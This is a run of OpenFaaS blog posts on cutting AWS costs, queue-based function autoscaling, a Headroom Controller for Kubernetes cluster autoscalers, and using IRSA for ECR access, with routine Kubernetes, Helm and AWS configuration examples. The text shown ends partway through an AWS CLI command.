Whilst OpenFaaS comes with predictable, flat-rate pricing, AWS is charged based upon consumption. We’ll explore how to save money and optimise our costs.

Introduction

There are a few common reasons why customers may decide to pay for OpenFaaS, and deploy it to AWS instead of using AWS Lambda, a serverless product that’s offered by AWS.

Control over limits - many settings that are restricted on AWS Lambda are configurable with OpenFaaS - from timeouts, to container runtimes, to CPU/memory limits.
Portability - customers often start with an easy and convenient option like Lambda before obtaining an enterprise customer that requires an additional deployment on-premises or into another cloud provider. Lambda is locked into AWS.
Cost savings - whilst Lambda starts within a free tier allowance, it can quickly get out of hand, and the cross-over point for a paid OpenFaaS license can be met quite quickly.
No need for cold starts - OpenFaaS functions maintain 1/1 replicas by default, unless you configure scale to zero on them. So there’s no need for any cold start, for critical functions.
No false economy - in order to keep Lambda costs reasonable, users will often under-provision the resources for their functions, or worse, over-provision them in order to get more vCPU.
Kubernetes all the way - if your team already deploys to Kubernetes, then Lambda is orthogonal and means your developers have to build and operate code in two different systems.

Of course there are other reasons, but these points stand out across customers.

Aspect	AWS Lambda	OpenFaaS on EKS
Free Tier	Yes (limited)	Free for personal use. Commercial use has predictable flat-rate licensing.
Scaling Cost	Per invocation + duration	EC2 - can optimise with autoscaling, spot instances, and scale to zero
Cold Starts	Unavoidable unless kept “warm”	No cold-start by default
Speed up the runtime	Add more RAM to get a bit more vCPU	Pick any amount of vCPU or RAM, or allocate NVMe for super fast storage
Access to GPUs	Not available	Yes, available using a node group with GPU instances
Total Cost at Scale	Can spike with traffic or increased product adoption/function execution time	Stable costs. Spot instances can reduce EC2 by up to 90%
Plays nicely with your Kubernetes deployments?	No, orthogonal tooling and development	Uses native Kubernetes objects including a CRD
Customise the limits/environment for functions	No	Yes, most settings can be changed easily
Time to deploy	Can take minutes to rollout a new version via CloudFormation	New version can be live in single-digit seconds
Portability	None	Run the same functions on any Kubernetes cluster in the cloud or on-premises

Knobs and dials for controlling cost

Kubernetes control-plane

Typically, you’ll deploy OpenFaaS to Kubernetes on AWS using their managed product Elastic Kubernetes Service (EKS). EKS has a running cost per cluster of around $75 USD per month.

You can also self-manage Kubernetes with a tool like K3s for more flexibility. But bear in mind, if you’re staying on AWS, the cost per control plane is not going to add up to a lot.

The unwritten costs of AWS

This is beyond the scope of our article that focuses on AWS EKS, EC2 and OpenFaaS, but take all the usual advice in hand on optimising or reducing the use of CloudWatch, S3, NAT gateways, and other AWS services.

Use VPC endpoints for AWS services (e.g., S3, DynamoDB) to avoid public internet fees—savings of $0.01/GB or more.
Minimize cross-AZ traffic by pinning functions to single-AZ nodes if latency allows.

Take a detailed look at your monthly bill with AWS Cost Explorer.

Avoid EKS Extended Support fees. EKS charges $0.60/hr per cluster if you linger on an unsupported Kubernetes version. Keep a quarterly upgrade policy (N-2 policy) to stay on the standard $0.10/hr control-plane price.

Kubernetes nodes

Kubernetes requires nodes to run your Pods, which are usually provided by AWS EC2 (virtual machines). AWS also offers products like Fargate, but Fargate tends to be more expensive, and slower to start up.

The cost of nodes can be optimised in three ways:

Right-size your nodes to match the functions.

By default, nodes can only run 100 Pods, so if you have many many Pods for your functions, using larger nodes could be a false economy.
Use autoscaling to scale nodes up and down based on demand.

One of our customers runs a separate production and staging EKS cluster, but the staging cluster costs them very little. With scale to zero enabled on all their functions, they can get away with a single node that just runs the control-plane, at a very low cost. As soon as a function is started, it’ll either load up on the existing node, or a new one will be added and removed after the function scales back down to zero again.

You’re likely aware of the benefits of AWS Savings Plans or Reserved Instances (RIs) for baseline nodes. If you are expecting your product to be in business for the next year or three, you can commit to purchase a certain amount of EC2 from AWS and get decent savings in return without any disk of the instances being terminated.
Use spot instances to save up to 90% of your costs.

Spot instances are the most obvious way to save money on AWS, cutting EC2 bills by up to 90%, however they do have some downsides. Spot instances can be terminated at any time, with just two minutes’ notice. The open-source node-autoscaler built by AWS for EC2 called Karpenter can help you out here, but we also need to remember that a spot instance can take 1-2 minutes to start up, register, and start running a Pod. We created the Headroom Controller to help reduce this delay, and the impact of instances being terminated.

Check yourself

We often see teams using nodes that are far too large, due to RAM/vCPU sizing that was taken from AWS Lambda, where you have to allocate more RAM to get additional vCPU quota. In one instance, a team needed to keep 300 functions “warm” and had historically allocated 3GB of RAM to each function. Why did they do that? When asked, they had no idea why that number was picked or how much RAM they actually needed.

Kubernetes doesn’t play by these rules, you can simply ask for what is required. The metrics built-into OpenFaaS can be used to monitor the resource usage of your functions and adjust the node size accordingly.

Open your Arms

In 2015, I had to recompile Docker from source to be able to run it on a Raspberry Pi. In fact I even had to recompile Go first as a prerequisite.

These days, Kubernetes and core tooling like ArgoCD, Helm, cert-manager, Istio, NATS, Prometheus, and Grafana all work flawlessly on the Arm architecture.

If you’re an AWS user, you should absolutely consider and experiment with running functions on Graviton instances. Whether that’s the whole collection, or just specific functions.

In return you’ll get fast performance and cost savings, whilst helping to reduce your carbon footprint since Arm chips tend to use way less energy.

The following page entitled Use Graviton instances and containers shows a 19.20% - 14.99% reduction in costs from using Graviton.

AWS Case study: Performance gains with AWS Graviton4 – a DevitoPRO case study

OpenFaaS licensing

Each installation of OpenFaaS requires a separate license key.

If you have environments that sound like this: Dev, QA, UAT, Staging, Pre-Prod, DR, Prod, then OpenFaaS could work out quite expensive.

To optimise your costs, you may want to reevaluate whether you really need as many as 7 different Kubernetes clusters to test your functions in before finally rolling them out to production. For OpenFaaS for Enterprises, we can sometimes offer custom package for this type of scenario, so definitely reach out to us for a call.

An alternative option when you have many environments is to use OpenFaaS for Enterprises and its multiple-namespace support. In this way, the various environments become Kubernetes namespaces that are isolated from one another. It’s also ideal for centrally managed IT, FaaS offered as a service to employees, and for multi-tenant environments.

Scale to Zero for functions

Scale to Zero for functions is a feature that allows your functions to scale down to zero when they are not being used. This can help you save money on your AWS costs by reducing the number of EC2 instances that are running at any given time.

The idle timeout can be set on a per-function basis, and unlike AWS Lambda, it’s opt-in. No need to keep a background process invoking your function wastefully, just in case.

You can learn how autoscaling and scale to zero work together in this blog post: On Autoscaling - What Goes Up Must Come Down

Delete old/unused functions

If you are running a large installation of OpenFaaS and have accumulated a large number of functions, you can review the metrics to understand which are no longer being used.

There are two approaches:

Use the built-in Prometheus metrics (defaults to 14 days of retention) to identify functions which can be removed. Or use your own long-term storage i.e. DataDog to search back even further.
If you’re using a multi-tenant installation of OpenFaaS for Enterprises, you can enable Billing Webhooks and track invocations over time in a database. You can then use this data to run a clean-up via Cron.

Do you really need Kubernetes?

We built another version of OpenFaaS called OpenFaaS Edge. It’s designed to run on a single VM or bare-metal host and can run up to 1000 functions.

OpenFaaS Edge is perfect for automations, background jobs, and other tasks that do not need to scale beyond a single machine or a single replica.

If you’re willing to do some legwork, it can also be installed on different hosts to shard functions across multiple machines.

Consider other compute providers than AWS

AWS EKS is probably the most platform that our customers use to deploy and manage OpenFaaS, but it’s not the only game in town.

For one, other compute providers may offer a better baseline cost for their VMs, or larger instances for similar pricing.

If you really want to crush costs, then moving to bare-metal is a great option - it can enable much more density at a lower cost per function. Bare-metal doesn’t have to mean buying a datacenter, or installing OpenStack on a few racks.

Providers such as Hetzner offer ridiculous value in comparison to AWS:

For x86_64:

EX44 (52 USD / mo ) - 20 vCPU, 64GB RAM, 2x 512 NVMe SSD
A102 (139 USD / mo) - 32vCPU, 128GB RAM, 2x 1.92TB NVMe SSD
AX162-R (256 USD / mo) - 96 vCPU, 256GB RAM, 2x 1.92TB NVMe SSD

For ARM:

RX220 (292 USD / mo) - 80 vCPU, 256GB RAM, 2x 3.84 TB NVMe SSD

Provider	Instance / host	Storage	vCPU	RAM	Monthly cost	Notes
AWS	m5.4xlarge	EBS	16	64GB	~$300	EBS is much slower than a local NVMe. Bandwidth costs extra. CPU is slower.
Hetzner	EX44	NVMe	20	64GB	$52	Fast local NVMe, bare-metal density. Bandwidth is unmetered and included in cost.

Now once you have that bare-metal that may be capable of running well over 100 Pods, you’re still going to be limited by the default limit of Kubernetes of 100 Pods per node.

The solution is to use a lightweight Firecracker microVM and we have a well supported solution that works with OpenFaaS and Kubernetes.

Using SlicerVM.com, you can densely pack in as many nodes as you can fit by slicing up each server, and installing Highly Available Kubernetes using K3sup, or a similar Kubernetes distribution of your choice. SlicerVM.com can run over multiple machines, so you can retain high-availability without introducing a single point of failure.

Slicer can also autoscale Kubernetes nodes, meaning you can recycle them instead of having to manage them like pets. That means no need to worry about OS patching and updates.

Hetzner’s prices are remarkable, but other companies offer bare-metal in the cloud too.

What if you simply cannot move off AWS? You’re half way through a SOC II audit, and can’t take on any new vendors? Perhaps do some initial research and experimentation, so that when you are in a position to review costs, you can make an accurate comparison.

Here’s how quick and easy it is to setup HA Kubernetes with SlicerVM

Click here to view the documentation.

Wrapping up

Most OpenFaaS customers enable a few sane defaults and largely don’t mention the cost of their hosting provider. Why? I think typically, the below is well understood by many customers. Maybe there’s something new below that could help you and your team? Maybe there’s something we didn’t mention, reach out and let us know!

From the top:

Do consider Arm and Graviton for a clear cost reduction and performance increase.
Do use autoscaling nodes with something like Karpenter or an AWS-managed nodepool.
Do consider whether spot instances can fit into your workflow.
Do enable scale to zero where a modest coldstart is acceptable, or where functions run mainly asynchronously.
Don’t overprovision CPU/RAM just because that’s what you had for a cloud function in the past.

We realise that many teams have made a firm commitment to stay on AWS and cannot consider another vendor, or self-hosting. But, if you can, do consider bare-metal, or on-premises infrastructure. Maybe you could run part of your product on a different cloud provider, if it meant getting the 5-6x cost reductions we outlined in the example with Hetzner?

Finally, if you are in need of help, reach out to us using your existing communication channels with us. Or if you’re new here via our Pricing page.

Introducing Queue Based Scaling for Functions

2025-07-29T00:00:00+00:00

Queue-Based Scaling is a long awaited feature for OpenFaaS that matches queued requests to the exact amount of replicas almost instantly.

The initial version of OpenFaaS released in 2016 had effective, but rudimentary autoscaling based upon Requests Per Second (RPS) and was driven through AlertManager, a component of the Prometheus project. In 2019, with growing needs of commercial users with long running jobs, we rewrote the autoscaler to query metrics directly from functions and Kubernetes to fine-tune how functions scaled.

OpenFaaS already has a versatile set of scaling modes that can be fine tuned such as: Requests Per Second (RPS), Capacity (inflight connections/concurrency), CPU, and Custom scaling modes. This new mode is specialised to match the needs of large amounts of background tasks and long running processing tasks.

What is Queue-Based Scaling?

Queue-Based Scaling is a new autoscaling mode for OpenFaaS functions. It is made possible by supporting changes that emit queue depth metrics for each function that’s being invoked asynchronously.

This new scaling mode fits well for functions that are:

Primarily invoked asynchronously
May have a large backlog of requests
Need to scale up to the maximum number of replicas as quickly as possible
Run in batches, bursts, or spikes for minutes to hours

Typical tasks include: Extract, Transform, Load (ETL) jobs, security/asset auditing and analysis, data processing, image processing, video transcoding, and file scanning, backup/synchronisation, and other background tasks.

All previous scaling modes used output metrics from the function to determine the amount of replicas, which can involve some lag as the invocations build up from a few per second, to hundreds or thousands per second.

When using the queue-depth, we have an input metric that is available immediately, and can be used to set the exact number of replicas needed to process the backlog of requests.

A note from a customer

Surge is a lending platform providing in-depth financial analysis, insights and risk management for their clients. They use dozens of OpenFaaS functions to process data in long-running asynchronous jobs. Part of that involves synchronising data between Salesforce.com and Snowflake, a data warehousing solution.

Kevin Lindsay, Principal Engineer at Surge rolled out Queue-Based Scaling for their existing functions and said:

“We just changed the com.openfaas.scale.type to queue and now async is basically instantly reactive, burning through large queues in minutes”

Kevin explained that Surge makes heavy use of Datadog for logging and insights, which charges based upon various factors, including the number of Pods and Nodes in the cluster. So unnecessary Pods, and extra capacity in the cluster means a larger bill, so having reactive horizontal scaling and scale to zero is a big win for them.

Load test - Comparing Queue-Based Scaling to Capacity Scaling

We ran a load test to compare the new Queue-Based Scaling mode to the existing Capacity scaling mode. Capacity mode is also effective for asynchronous invocations, and functions that are invoked in a hybrid manner (i.e. a mixture of both synchronous and asynchronous invocations).

For the test, we used hey to generate 1000 invocations of the sleep function from the store. Each invocation had a variable run-time of 10-25s to simulate a long-running job.

You will see a number of retries in the graphs emitted as 429 responses from the function. This is because we set a hard-limit of 5 inflight connections per replica to simulate a limited or expensive resource such as API calls or database connections.

First up - Capacity Scaling:

We see that the load starts low, and builds up as the number of inflight connections increases, and the autoscaler responds by adding more replicas.

It is effective, but given that all of the invocations are asynchronous, we already had the data to scale up to the maximum number of replicas immediately.

Next up - Queue-Based Scaling:

The load metric in this screenshot is the equivalent of the pending queue-depth.

We see the maximum number of replicas jump to 10 and remain there until the queue is emptied, which means the load (which is the number of invocations) is also able to start out at the maximum level.

How does it work?

Just like all the other autoscaling modes, basic ranges are set on the function’s stack.yaml file, or via REST API call

A quick recap on scaling modes

One size does not fit all, and to give a quick summary:

RPS - a default, and useful for most functions that execute quickly
Capacity - also known as “inflight connections” or “concurrency” - best for long running jobs or those which are going to be limited on concurrency
CPU - a good fit when RPS/Capacity aren’t working as expected
Custom - any metric that you can find in Prometheus, or emit from some component of your stack can be used to drive scaling

Demo with Queue-Based Scaling

First, you can set a custom range for the minimum and maximum number of replicas (or use the defaults):

functions:
  etl:
    labels:
        com.openfaas.scale.min: "1"
        com.openfaas.scale.max: "100"

Then, you specify whether it should also scale to zero, with an optional custom idle period:

    labels:
        com.openfaas.scale.zero: "true"
        com.openfaas.scale.zero-duration: "5m"

Finally, you can set the scaling mode and how many requests per Pod to target:

    labels:
        com.openfaas.scale.mode: "queue"
        com.openfaas.scale.target: "10"
        com.openfaas.scale.target-proportion: "1"

With all of the above, we have a function that:

Scales from 1 to 10 replicas
Scales to zero after 5 minutes of inactivity
For each 10 requests in the queue, we will get 1 Pod

So if you have to scan 1,000,000 CSV files from an AWS S3 Bucket, you could enqueue one request for each file. This would create a queue depth of 1M requests and so the autoscaler would immediately create 100 Pods (the maximum set via the label).

In any of the prior modes, the Queue Worker would have to build up a steady flow of requests, in order for the scaling to take place.

If you wanted to generate load in a rudimentary way, you could use the open source tool hey, to submit i.e. 2.5 million requests to the above function.

hey -d PAYLOAD -m POST -n 2500000 -c 100 http://127.0.0.1:8080/async-function/etl

Any function invoked via the queue-worker can also return its result via a webhook, if you pass in a URL via the X-Callback-Url header.

Concurrency limiting and retrying requests

Queued requests can be limited in concurrency, and retried if they fail.

Hard concurrency limiting can be achieved by setting the max_inflight environment variable i.e. 10 would mean the 11th request gets a 429 Too Many Requests response.

    environment:
        max_inflight: "10"

Retries are already configured as a system-wide default from the Helm chart, but they can be overridden on a per function basis, which is important for long running jobs that may take a while to complete.

    annotations:
      com.openfaas.retry.attempts: "100"
      com.openfaas.retry.codes: "429"
      com.openfaas.retry.min_wait: "5s"
      com.openfaas.retry.max_wait: "5m"

Better fairness and efficiency

The previous version of the Queue Worker created a single Consumer for all invocations.

That meant that if you had 10,000 invocations come in from one tenant for their functions, they would likely block any other requests that came in after that.

The new mode creates a Consumer per function, where each Consumer gets scheduled independently into a work queue.

If you do find that certain tenants, or functions are monopolising the queue, you can provision dedicated queues using the Queue Worker Helm chart.

Let’s picture the difference by observing the Grafana Dashboard for the Queue Worker.

In the first picture, we’ll show the default mode “static” where a single Consumer is created for all functions, and asynchronous invocations are processed in a FIFO manner.

The sleep-1 function has all of its invocations processed first, and sleep-2 is unable to make any progress until the first function has been processed.

Next, we show two functions that are invoked asynchronously, but this time with the new “function” mode. Each function has its own Consumer, and so they can be processed independently.

Here, we see that the sleep-1 function is still being processed first, but the sleep-2 function is also able to make progress at the same time.

What changes have been made?

A number of changes have been made to support Queue-Based Scaling:

Queue Worker - the component that performs asynchronous invocations

When set to run in “function” mode, it will now create a Consumer per function with queued requests.

It deletes any Consumers once all available invocations have been processed.* Helm chart - new scaling rule and type “queue”

No changes were needed in the autoscaler, however the Helm chart introduces a new scaling rule named “queue”
Gateway - publish invocations to an updated subject

Previously all messages were published to a single subject in NATS which meant no metric could be obtained on a per-function basis.

The updated subject format includes the function name, allowing for precise queue depth metrics to be collected.

Note that the 0.5.x gateway will start publishing messages to a new subject format, so if you update the gateway, you must also update the Queue Worker to 0.4.x or later, otherwise the Queue Worker will not be able to consume any messages.

This includes any dedicated or separate queue-workers that you have deployed, update them using the separate queue-worker Helm chart.

How do you turn it all on?

Since these features change the way that OpenFaaS works, and we value backwards compatibility, Queue-Based Scaling is an opt-in feature.

First, update to the latest version of the OpenFaaS Helm chart which includes:

Queue Worker 0.4.x or later
Gateway 0.5.x or later

Then configure the following in your values.yaml file:

jetstreamQueueWorker:
  mode: function

The mode variable can be set to static to use the previous FIFO / single Consumer model, or function to use the new Consumer per function model.

At the same time, as introducing this new setting, we have deprecated an older configuration option that is no longer needed: queueMode.

So if you have a queueMode setting in your values.yaml, you can now safely remove it so long as you stay on a newer version of the Helm chart.

In the main chart, the jetstreamQueueWorker.durableName field is no longer used or required.

Dedicated queue-workers

If you have dedicated queue-workers deployed, you will need to update them using the separate queue-worker Helm chart.

A new field is introduced called queueName in values.yaml, the default value is not set. When it is not set, the queue will take the name of the stream.

So if you had an annotation of com.openfaas.queue=slow-fns, you would set the queueName like this in values.yaml:

maxInflight: 5
+queueName: slow-fns
mode: static
nats:
  stream:
    name: slow-fns
  consumer:
    durableName: slow-fns-workers
upstreamTimeout: 15m  

Alternatively, you can leave queueName as empty, or not set it at all, and the name will be taken from nats.stream.name.

The top level setting durableName has now been removed.

You can read more in the README for the queue-worker chart.

Wrapping up

A quick summary about Queue-Based Scaling:

The Queue-Worker consumes messages in a fairer way than previously
It creates Consumers per function but only when they have some work to do
The new queue scaling mode is reactive and precise - setting the exact number of replicas immediately
Better for multi-tenant deployments, where one tenant cannot monopolise the queue as easily

If you’d like a demo about asynchronous processing or long running jobs, please reach out via the form on our pricing page.

Use-cases:

Docs:

Scale Up Pods Faster in Kubernetes with Added Headroom

2025-07-22T00:00:00+00:00

Cluster Autoscalers add and remove Nodes to match the demand for resources. But they often leave no room for new Pods, adding an extra 1-2 minutes of latency.

Notice: The Headroom Controller is now out of the free beta/trial period. OpenFaaS customers can use it for free on licensed clusters. For everyone else, you can subscribe using the notes in the Helm chart README file.

That’s latency that you don’t want to pass onto your users.

In addition, when using spot instances, you’re given a very a short window to reschedule Pods from reclaimed nodes.

In this post we’ll introduce the new Headroom Controller developed and supported by the OpenFaaS team to help solve this problem. It’s installed via Helm, configured natively via its own Custom Resource Definition (CRD), with commercial support included.

It’s built for Kubernetes and works with any autoscaler. OpenFaaS isn’t required, but we think your users will appreciate the quicker scaling and start-up times.

Contents:

What kind of autoscaling does OpenFaaS provide?
What is a Cluster Autoscaler?
What are spot instances?
What is headroom?
How does the headroom controller work?
Getting started with the headroom controller
Next steps

What is a Cluster Autoscaler?

A cluster autoscaler works differently to the OpenFaaS autoscaler. Instead of scaling the number of replicas or Pods for a function, it measures the demand in the cluster for CPU and RAM, then adds or removes nodes to match the demand.

When you combine a Pod autoscaler such as OpenFaaS or HPAv2 with a cluster autoscaler, you can optimise for cost and efficiency. You pack the most amount of Pods into the least amount of nodes.

For instance, if you run mainly batch jobs, file conversions, async workloads or ETL jobs - you may be able to scale down to zero Pods overnight, on the weekends or over the holidays. Over time the costs for compute add-up, even if you are using spot instances (mentioned below).

Two popular open source autoscalers are Cluster Autoscaler - a mature and well supported project maintained by the Kubernetes Autoscaling SIG, and Karpenter - a modern and fast autoscaler developed by AWS for Elastic Kubernetes Service (EKS) and Azure Kubernetes Service (AKS).

Many cloud services have their own autoscaling groups or managed node pools, these should work just as well with the Headroom Controller.

What kind of autoscaling does OpenFaaS provide?

OpenFaaS is a serverless platform for Kubernetes that provides an enterprise-grade self-hosted alternative to AWS Lambda.

It implements its own horizontal scaling for functions. Functions are implemented as Kubernetes Deployments, with a .replicas field in its spec. The autoscaler works by setting that field, and Kubernetes does the rest.

Unlike a generic autoscaler such as HPAv2 or KEDA, the OpenFaaS autoscaler is purpose built to scale functions. It can scale based on Requests Per Second (RPS), Inflight requests (capacity), CPU, RAM, Queue Depth, or any custom metric in Prometheus.

As additional replicas of a function are added into the cluster - they benefit from load balancing across multiple processes and machines to increase performance and to distribute work.ple.

The autoscaler will also scale idle functions to “zero” which causes all Pods to be terminated and the resources to be freed up.

What are spot instances?

OpenFaaS and its autoscaler can work on-premises, or in the cloud, but spot instances are really a feature of the cloud.

Providers such as AWS and GCP sell excess capacity within their infrastructure at a discount - up to 90% off the regular price. But this does come at a cost - the instance could be terminated at any time, and you may have a very short window to relocate your Pods to another node.

If an autoscaler like Karpenter has packed all your Pods into a single very large node, then you have a large failure domain and could incur significant disruption when the instance is terminated.

The best workloads for spot instances are stateless, and complete their work within a short period of time. Anything that may be stateful or run for a long time, should be avoided or made immutable, and able to restart from a checkpoint or the beginning.

Headroom can also help when spot instances are reclaimed, especially if you use a spread constraint, so the headroom is reserved over a number of instances.

You can learn more about OpenFaaS and Karpenter on the blog. We’ll include links in the conclusion.

What is headroom?

Cluster autoscalers tend to pack workloads into nodes as tightly as possible, meaning that if a new Pod is deployed or a workload scales up, a new node may have to be added to the cluster.

Adding a node can take 1-2 minutes, or even longer depending on the cluster and the cloud provider.

With headroom, a buffer of configurable size is added to the cluster with Pods which request resources, but simply run a sleep process. They run in a very low priority class, so that when a normal workload comes along, instead of waiting for a new node, the headroom Pods are evicted and the Pod starts immediately.

Then, the cluster autoscaler will request a new node in the background to add the headroom Pods back into the cluster.

In this way, the cluster maintains a buffer so resources can be added instantly when needed.

How does the headroom controller work?

The Headroom Controller can be installed via Helm from the OpenFaaS chart repository.

Once installed, you can create a default and a low-priority class for the Kubernetes scheduler to use.

All Pods will assume the default priority class unless otherwise specified, which means they can always evict a headroom Pod.

Next, you can define one or more Headroom resources.

kind: Headroom
apiVersion: openfaas.com/v1
metadata:
  name: headroom
spec:
  priorityClassName: headroom
  requests:
    cpu: 250m
    memory: 250Mi

Now set up two priority classes.

Create a default priority priorityClassName

  kubectl apply -f - << EOF
  apiVersion: scheduling.k8s.io/v1
  kind: PriorityClass
  metadata:
    name: default
  value: 1000
  globalDefault: true
  description: "Default priority class for all pods"
  EOF

Create a low priority class for the headroom Custom Resources

  kubectl apply -f - <<EOF
  apiVersion: scheduling.k8s.io/v1
  kind: PriorityClass
  metadata:
    name: headroom
  description: Low priority class for headroom pods
  globalDefault: false
  preemptionPolicy: Never
  value: -10
  EOF

Within a short period of time, a new Deployment will be created with the request values you specified.

If these Pods cannot be scheduled, the autoscaler you’re using should request one or more new nodes to be added to the cluster to host them.

Then, whenever a new Pod is scheduled or updated which requires more resources than the cluster has available, the headroom Pods will be evicted and the new Pod will start immediately.

Watch a video demo of the Headroom Controller in action with the Cluster Autoscaler, K3s and Firecracker VMs managed by our Slicer product.

Spreading headroom over multiple nodes

If you are using a cluster autoscaler like Karpenter, you can spread the headroom over multiple nodes by using a spread constraint.

The below example will spread the headroom over 5 different nodes, with a hard constraint making sure that if a spot instance is terminated, you should have an immediate buffer available for the Pods that need to be relocated.

This can be a hard rule with whenUnsatisfiable: DoNotSchedule which won’t allow more than one headroom Pod on a node, or a soft rule with whenUnsatisfiable: ScheduleAnyway which will try its best to spread the Pods out across the cluster, but won’t block them if that’s not possible.

kind: Headroom
apiVersion: openfaas.com/v1
metadata:
  name: headroom-spread
spec:
  replicas: 5
  topologySpreadConstraints:
    - maxSkew: 1
      topologyKey: kubernetes.io/hostname
      whenUnsatisfiable: DoNotSchedule
      labelSelector:
        matchLabels:
          headroom: headroom-spread
  priorityClassName: headroom
  requests:
    cpu: 500m # 0.5 vCPU
    memory: 512Mi # 512MB RAM

All Pods created by the Headroom Controller will have the label headroom: $NAME_OF_HEADROOM which can be used to select them in a selector.

The following screenshot shows a K3s cluster with one master, and 5 additional nodes which have been added to the cluster to satisfy the spread constraint.

Scaling the headroom

The Headroom resource also has a .replicas field which works with kubectl scale, so that you can adjust the headroom according to your needs.

spec:
  replicas: 10

You could also write a simple Kubernetes Cron Job to scale the headroom down during the holidays, or overnight - if your product tends to be used more during the day.

Assuming that you create a service account for the Cron Job named i.e. headroom-scaler with permission to update the Headroom resource, it would look something like this:

kind: CronJob
apiVersion: batch/v1
metadata:
  name: scale-headroom
spec:
  restartPolicy: OnFailure
  schedule: "0 0 * * *"
  jobTemplate:
    spec:
      template:
        spec:
          serviceAccountName: headroom-scaler
          containers:
            - name: kubectl
              image: alpine/kubectl:latest # Or a specific version
              command:
              - "/bin/sh"
              - "-c"
              - |
                apk add --no-cache kubectl
                kubectl scale headroom/openfaas-fn-buffer --replicas=0

The Cron Job will scale the headroom down to 0 replicas at midnight every day.

You’d just need another one to set it back to the desired state later on.

A full example is available in the README for the headroom controller’s Helm chart.

What if Headroom Pods need a securityContext?

If you are running Kyverno, Gatekeeper, it’s likely that Pods cannot be scheduled without some kind of securityContext. We’ve thought of that already and have added a .podSecurityContext field to the Headroom resource.

spec:
  podSecurityContext:
    runAsNonRoot: true
    runAsUser: 1000
    runAsGroup: 1000
    fsGroup: 1000

Tolerations for node groups and spot instances

Spot instances are used by many OpenFaaS customers in production for running functions. A taint is applied to the node group to prevent control plane workloads from running on them, then a toleration is required on the Function Pods to allow them to run on the node group. For Functions, this is achieved through a Profile. Headroom resources specify it directly on their .Spec.

Here’s what we used during testing for AWS EKS with Karpenter, so that headroom Pods ran on spot instances.

spec:
  tolerations:
    - key: "karpenter.sh/node-group"
      operator: "Equal"
      value: "spot"
      effect: "NoSchedule"

For a self-hosted HA K3s cluster with SlicerVM.com running with our modified Cluster Autoscaler, you could try something like this:

kubectl taint node k3s-cp-1 cp:NoSchedule
kubectl taint node k3s-cp-2 cp:NoSchedule
kubectl taint node k3s-cp-3 cp:NoSchedule

Or if there are no agents yet:

kubectl taint node --all cp:NoSchedule

Followed by adding:

spec:
  priorityClassName: headroom
  replicas: 2
  requests:
    cpu: 500m
    memory: 512Mi
  tolerations:
  - effect: NoSchedule
    key: cp
    operator: Equal
    value: "1"

In that case, if you have no agents, the autoscaler will provision a new node to host the two new replicas of the headroom Pods.

Getting started with the headroom controller

You can get started right away, even if you’re not an OpenFaaS customer. OpenFaaS is not a pre-requisite, but we’ve put it under the brand to signal to customers that this is something we are supporting, and think is an important add-on for any cluster autoscaler.

helm repo add openfaas https://openfaas.github.io/faas-netes/
helm repo update

Write a values-custom.yaml file.

Decide whether you want it to run across all namespaces in the cluster:

rbac:
  role: ClusterRole

Or to operate only in the namespace given to helm via the --namespace flag.

role: Role

There are some other flags to play with, but the defaults should be fine for most use cases.

You could install it into the kube-system namespace, the openfaas namespace, or a custom one.

helm upgrade --install headroom-controller openfaas/headroom-controller \
	--namespace kube-system \
	-f ./values-custom.yaml

Once you’ve got some confidence in how the controller works, you could add it to your GitOps repository with ArgoCD or Flux along with your other infrastructure tools such as cert-manager, ingress-nginx, external-secrets, and so forth.

Next steps

Whilst this is a new project, we’ve tested it with Karpenter, and Cluster Autoscaler, and it worked as expected.

You will need to spend some time fine-tuning your Headroom resources to get the best performance for your clusters and applications.

Feel free to reach out with your comments, questions, and suggestions.

During the beta period, anyone can try out the Headroom Controller for free without signing up for a subscription.

After the beta period, OpenFaaS customers get free access to the Headroom Controller as part of their subscription. For everyone else, you can purchase a license for 300 USD/year per cluster - which is less than 1 USD per day for near-instant scaling and scheduling of Pods.

Even if you wanted to make your own controller for fun, you have to factor in the continued maintenance and support, and what happens when you leave the company. We’ve priced the controller at the point where it makes sense to outsource it.

You may also like these past blog posts:

Manage AWS Resources from OpenFaaS Functions With IRSA

2025-07-09T00:00:00+00:00

In this post we’ll create a function in Golang that uses AWS IAM and ambient credentials to create and manage resources in AWS.

As a built-in offering, AWS Lambda is often used to respond to events and to manage AWS resources, so how does OpenFaaS compare?

OpenFaaS is a self-hosted platform that can run on any cloud or on-premises, including AWS EKS. Whilst AWS Lambda is a popular and convenient offering, it does have some tradeoffs and limitations which can cause friction for teams with more specialised requirements, workflows, or high usage ($$$).

If your team is developing code for Kubernetes using AWS EKS, then OpenFaaS can be a more natural fit than AWS Lambda, since it can use the same workflows, tools and processes you already have in place for your existing Kubernetes applications. That includes Helm, CRDs, Kubernetes RBAC, container builders in CI/CD and ArgoCD/Flux.

Both AWS Lambda and OpenFaaS can be used to manage resources within AWS, with either shared credentials which need to be created, managed and rotated by your team, or with ambient credentials which are automatically obtained at runtime by the function.

Our function will be used to create repositories in Elastic Container Registry (ECR). This is a common task for teams that run OpenFaaS in a multi-tenant environment, where each tenant or team publishes their own functions to the platform. It’ll receive credentials using IAM Roles for Service Accounts (IRSA), which is the most modern way to map Kubernetes Service Accounts to native AWS IAM roles.

Contents:

Create an EKS cluster with IRSA enabled
Install OpenFaaS Standard or For Enterprises
IAM Policy for ECR Access
Create IAM Role and Service Account
Create a function that uses the IAM Role
Invoke the function to create a new repository
Wrapping up and next steps

Create an EKS cluster with IRSA enabled

You may already have an AWS EKS cluster provisioned, if so, you can enable IRSA by following these instructions: IRSA on EKS.

If not, we can create a quick cluster using the eksctl CLI tool:

eksctl create cluster \
    --name of-test \
    --with-oidc \
    --spot \
    --nodes 1 \
    --nodes-max 3 \
    --nodes-min 1 \
    --region eu-west-1

Whilst eksctl looks like an imperative CLI tool, it is a client that manages declarative CloudFormation templates under the hood. You’ll see the one created for your cluster by navigating to CloudFormation page of the AWS console. Provisioning can take up to 15-20 minutes depending on how many nodes and add-ons you’ve selected.

Install OpenFaaS Standard or For Enterprises

If you don’t have OpenFaaS installed, you can follow the OpenFaaS installation guide. If you already have OpenFaaS installed, you can skip this step.

For experimentation, you can use port-forwarding instead of setting up DNS and Ingress for the OpenFaaS gateway. It’ll make it a bit quicker to get started.

IAM Policy for ECR Access

We need to create an IAM Policy that will allow the OpenFaaS function to create and query repositories in ECR.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "ecr:CreateRepository",
        "ecr:DeleteRepository",
        "ecr:DescribeRepositories"
      ],
      "Resource": "*"
    }
  ]
}

You can create this role using the AWS CLI or the AWS Management Console. If you’re using the CLI, you can run the following command:

aws iam create-policy \
